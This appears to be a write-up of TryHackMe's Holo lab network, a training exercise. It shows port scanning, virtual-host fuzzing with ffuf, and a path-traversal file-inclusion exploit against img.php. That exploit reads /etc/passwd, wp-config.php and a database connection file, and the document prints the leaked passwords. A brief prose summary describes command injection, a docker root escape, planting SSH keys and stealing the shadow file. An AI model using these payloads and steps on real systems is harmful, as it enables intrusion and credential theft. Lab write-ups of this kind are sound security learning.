📚 Table of Contents
$ sudo rustscan -t 3000 --tries 2 -b 8192 -u 16384 -a 10.200.110.0/24,192.168.100.0/24 -- -sS -sV -sC -oN 10.200.110.0/24,192.168.100.0/24.$(basename $PWD).nmap.txt
L-SRV01
| Ports | Service | Notes |
|---|---|---|
| 22 | SSH | |
| 80 | HTTP | Apache Webserver serving Wordpress 5.5.3 webpage for {www.,}holo.live. |
| We also find two other domains admin. and dev. through vhost enumeration. | ||
| 33060 | MySql |
TryHackMe’s Task 9 points us in the direction of Virtual Host enumeration of the webserver. To do this we used a wordlist and ffuf as shown below:
$ ffuf -c -t 80 -u '<http://10.200.110.33/>' -H 'Host: FUZZ.holo.live' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fc 400,302 -fs 21456
/'___\\ /'___\\ /'___\\
/\\ \\__/ /\\ \\__/ __ __ /\\ \\__/
\\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\
\\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/
\\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\
\\/_/ \\/_/ \\/___/ \\/_/
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : <http://10.200.110.33/>
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.holo.live
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 80
:: Matcher : Response status: all
:: Filter : Response status: 400,302
:: Filter : Response size: 21456
________________________________________________
www [Status: 200, Size: 21405, Words: 1285, Lines: 156, Duration: 259ms]
admin [Status: 200, Size: 1845, Words: 453, Lines: 76, Duration: 5089ms]
dev [Status: 200, Size: 7515, Words: 639, Lines: 272, Duration: 5114ms]
As a result of this vhost enumeration we found two more possible domains to look at, admin and dev. Let’s add both of those to our /etc/hosts file.
I started browsing the dev.holo.live domain and the Talents page contained a number of images of Holo employees. Looking at the page’s source code revealed that these images were being loaded via a PHP script. This immediately stood out to me as possible LFI and it turned out it was.
$ curl '<http://dev.holo.live/img.php?file=../../../../etc/passwd>'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false
Let’s check the wordpress config to see if we can leak DB credentials:
$ curl -s '<http://dev.holo.live/img.php?file=../../../../var/www/wordpress/wp-config.php>' | grep define
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'admin' );
define( 'DB_PASSWORD', 'DBManagerLogin!' );
define( 'DB_HOST', '127.0.0.1' );
define( 'DB_CHARSET', 'utf8' );
define( 'DB_COLLATE', '' );
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );
define('AUTH_KEY', 'c 8Ui7]??:^)!64-*duMT<JE=j^qG|,`jn<|c,G[-UG4]6lveE|JAMs s,f~]Bus');
define('SECURE_AUTH_KEY', 'y={Qrj;rk-guTo&G0lIm7TGPrSg+,J2CBRf2F<9#(O.:~2XR5 2$nTP|{5X|jP+*');
define('LOGGED_IN_KEY', 'c.G5Xn>d~Dc^<o]?S&hHY,:-nubV.D%V6&g734%#ht8t>+@0FONb+k$iz%BB.tTX');
define('NONCE_KEY', 'k2F.{B@kOl2Vzm]k66*}G&%(ywH1Hj-{KP`/#R_B9Rl (HLC`Dy=_2Ol1LfbB&+E');
define('AUTH_SALT', 'wq)-kpAUMl!e{XI$/g e8HKMP,$vyi-@(@e77CK%N|)@z9oTz}%/WXoF0)5|ye<>');
define('SECURE_AUTH_SALT', 'W&|w$+ EmvLO6o/$|{lU&ACm+Wazf5Y3`.csw.[0/k#HgW)K,5n?2r-a|<DH{h3?');
define('LOGGED_IN_SALT', '+,.gb4Cd7S?u.g 0`e_h}FXpBW|COgv-GG>{F-I@#$2p.|#oYjQ/{L]e3g:gvZ)e');
define('NONCE_SALT', 'CF;H:Q-w+_&@)vQJ;V0kZy<-MhBhD_MB#x)sCOU}Y(( E:ZkKx-kNxh[u01y.OuR');
define( 'WP_DEBUG', true );
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
Further digging using what we found in robots.txt turns up some more credentials:
http://admin.holo.live/robots.txt and some interesting paths
User-agent: *
Disallow: /var/www/admin/db.php
Disallow: /var/www/admin/dashboard.php
Disallow: /var/www/admin/supersecretdir/creds.txt
$ curl -s '<http://dev.holo.live/img.php?file=../../../../var/www/admin/db_connect.php>'
<?php
define('DB_SRV', '192.168.100.1');
define('DB_PASSWD', "!123SecureAdminDashboard321!");
define('DB_USER', 'admin');
define('DB_NAME', 'DashboardDB');
$connection = mysqli_connect(DB_SRV, DB_USER, DB_PASSWD, DB_NAME);
if($connection == false){
die("Error: Connection to Database could not be made." . mysqli_connect_error());}
?>
We had command injection from a shell. This got us into the docker container.
We found mysql and injected more command shells to get into the host machine.
From here we found a Set UID docker binary and spawn a root container with the host mounted into it. We also added our SSH keys for easy access again and stole the shadow file to crack the password.